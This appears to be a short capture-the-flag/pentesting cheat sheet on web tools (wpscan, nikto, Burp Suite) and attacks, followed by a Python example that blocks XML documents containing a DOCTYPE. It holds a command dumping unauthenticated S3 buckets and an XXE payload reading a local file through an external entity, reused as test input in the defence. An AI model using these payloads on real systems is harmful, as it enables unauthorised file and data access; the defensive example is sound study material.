Web

Tools

  • wpscan - Website

    Scans WordPress sites for vulnerabilities.

  • nikto - GitHub

    Website scanner implemented in Perl.

  • Burp Suite - Website

    The most used tool for web pentesting. It is a proxy that lets you intercept and modify HTTP requests and responses.

Attacks

  • AWS / S3 Buckets dump

    Dump all files from an S3 bucket that does not require authentication.

    aws s3 cp --recursive --no-sign-request s3://<bucket_name> .

  • XXE: XML External Entity

    Includes local files in an XML document through an external entity. Can be used to get an LFI (local file inclusion) out of an XML parser. XML document that displays the content of the file /flag:

    Don’t forget to use on Windows (for utf16).

    <?xml version="1.0"?>
    <!DOCTYPE data [
    <!ELEMENT data ANY>
    <!ENTITY file SYSTEM "file:///flag">
    ]>
    <data>&file;</data>
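
    On the parsing side, the document above is stopped by refusing any DOCTYPE before entities are processed. The following is an added example, not part of the original notes: it uses Python's standard expat bindings, and the names parse_untrusted, is_rejected and DTDForbidden, like the sample documents, are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it reaches the DOCTYPE, before any
    # <!ENTITY ...> declaration inside it is processed.
    raise DTDForbidden(f"DOCTYPE {name!r} not allowed in untrusted XML")


def parse_untrusted(data: bytes) -> ET.Element:
    """Return the parsed root element, or raise DTDForbidden."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)   # first pass: refuse documents with a DTD
    return ET.fromstring(data)  # second pass: build the tree


def is_rejected(data: bytes) -> bool:
    """True if parse_untrusted refuses the document because of a DTD."""
    try:
        parse_untrusted(data)
    except DTDForbidden:
        return True
    return False


# Constructed sample inputs.
BENIGN = b'<?xml version="1.0"?><data>fish &amp; chips</data>'
WITH_ENTITY = b'''<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///flag">
]>
<data>&file;</data>'''
# Same document re-encoded as UTF-16: the check runs inside the parser,
# so it does not depend on the byte encoding of the input.
WITH_ENTITY_UTF16 = WITH_ENTITY.decode("ascii").encode("utf-16")

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).text)
    print(is_rejected(WITH_ENTITY), is_rejected(WITH_ENTITY_UTF16))
```

    Predefined entities such as &amp; still parse, since they need no DTD.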